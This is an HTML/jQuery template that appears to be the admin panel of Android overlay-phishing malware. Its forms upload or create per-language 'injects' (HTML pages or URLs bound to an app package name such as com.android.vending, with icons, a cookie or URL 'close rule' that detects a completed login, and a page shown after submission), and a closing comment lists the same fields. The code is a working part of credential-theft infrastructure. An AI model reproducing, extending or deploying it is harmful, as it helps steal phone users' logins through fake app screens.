<script>
function toggleGroupId()
{
	if($('#groupId').is(":visible"))
		$('#groupId').hide()
	else
		$('#groupId').show()
}

function showHTML()
{
	$('#div_html').show()
	$('#div_url').hide()
}

function showURL()
{
	$('#div_url').show()
	$('#div_html').hide()
}
</script>

<div class="row">
	<div class="col-md-6">

<div class="panel panel-default">
	<div class="panel-heading">
		<h3 class="panel-title">Import Injects from ZIP Archive</h3>
	</div>
	<div class="panel-body">
		<div class="row">
			<div class="col-md-12">
				<form method="post" enctype="multipart/form-data" action="?a=admin&action=smarts&sub_action=import">

					<cite>
					<p>ZIP must contain folders with html/png files:
						<ul class="blackOL">
							<li>ES</li>
								<ul>
									<li>spanish.inject.1.html</li>
									<li>spanish.icon.1.png</li>
								</ul>
							<li>DE</li>
								<ul>
									<li>german.inject.1.html</li>
									<li>german.icon.1.png</li>
								</ul>
							<li>...</li>
						</ul>
					</p>
					</cite>
					<p>ZIP Archive <i>(Max size: %MAX_SIZE%)</i><input type="file" class="form-control" name="zip" /></p>
					<p>
						<label for="chk1">Use folders names (ES, DE) as a group </label>
						<input id="chk1" type="checkbox" name="use_folders" onclick="toggleGroupId()" checked>
						
			<div class="row" id="groupId" style="display: none">
				<div class="col-md-3">Group Name</div>
				<div class="col-md-0"></div>
				<div class="col-md-3"><input type="text" class="form-control" pattern="[a-zA-Z0-9]{1,16}" maxlength="16" placeholder="DE" name="group" /></div>
				<div class="col-md-6"><i>(Letters and digits only)</i></div>
			</div>
			
					</p>
					
					<p class="text-center"><input type="submit" class="btn btn-primary" value="Upload" /></p>
				</form>
			</div>
		</div>
	</div>
</div>

	</div>
	
	<!-- right pane -->
	<div class="col-md-6">

		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Create New Inject</h3>
			</div>
			<div class="panel-body">

<form method="post" enctype="multipart/form-data" action="?a=admin&action=smarts&sub_action=create">
	
		<div class="row">
			<div class="col-md-2">Inject type</div>
			<div class="col-md-1"></div>
			<div class="col-md-2"><input id="chk_html" type="radio" name="stype" value="html" onclick="showHTML()" checked /><label for="chk_html">&nbsp;&nbsp;HTML</label></div>
			<div class="col-md-2"><input id="chk_url" type="radio" name="stype" value="url" onclick="showURL()" /><label for="chk_url">&nbsp;&nbsp;URL</label></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">Group Name</div>
			<div class="col-md-0"></div>
			<div class="col-md-3"><input type="text" required class="form-control" pattern="[a-zA-Z0-9]{1,16}" maxlength="16" placeholder="DE" name="group" /></div>
			<div class="col-md-6"><i>(Letters and digits only)</i></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">Package</div>
			<div class="col-md-0"></div>
			<div class="col-md-6"><input type="text" required class="form-control" pattern="[a-zA-Z0-9\.]{3,128}" placeholder="com.android.vending" name="package" /></div>
			<div class="col-md-3"></div>
		</div>
		
<span id="div_html">
		<br />
		<div class="row">
			<div class="col-md-3">HTML file</div>
			<div class="col-md-0"></div>
			<div class="col-md-3"><input type="file" name="html" /></div>
		</div>
</span>
		
<span id="div_url" style="display: none">
		<br />
		<div class="row">
			<div class="col-md-3">URL</div>
			<div class="col-md-0"></div>
			<div class="col-md-9"><input type="text" placeholder="https://google.com/" class="form-control" name="url" /></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">Close rule</div>
			<div class="col-md-0"></div>
			<div class="col-md-4"><input type="text" class="form-control" placeholder="&loggedIn=1" name="close_rule" /></div>
			<div class="col-md-5"><i>(Part of URL/Cookie to submit)</i></div>
		</div>
</span>

		<br />
		<div class="row">
			<div class="col-md-3">Cap HTML file</div>
			<div class="col-md-0"></div>
			<div class="col-md-4"><input type="file" name="cap_data" /></div>
			<div class="col-md-5"><i>(Appears after inject submitted)</i></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">Icon file (PNG)</div>
			<div class="col-md-0"></div>
			<div class="col-md-3"><input type="file" name="icon" /></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3">Enabled by default</div>
			<div class="col-md-0"></div>
			<div class="col-md-3"><input type="checkbox" checked name="is_active" /></div>
		</div>
		<br />
		<div class="row">
			<div class="col-md-3"></div>
			<div class="col-md-3"><input type="submit" class="btn btn-primary" value="Create" /></div>
		</div>
		</form>

			</div>
		</div>

	</div>

</div>


<!--
stype=html, sgroup=FIELD, package=NAME, data=HTML, cap_data="", icon=PNG, is_active=1

- ZIP choose file
- group [   es ]
- [x] folder as group name

[SUBMIT]
-->
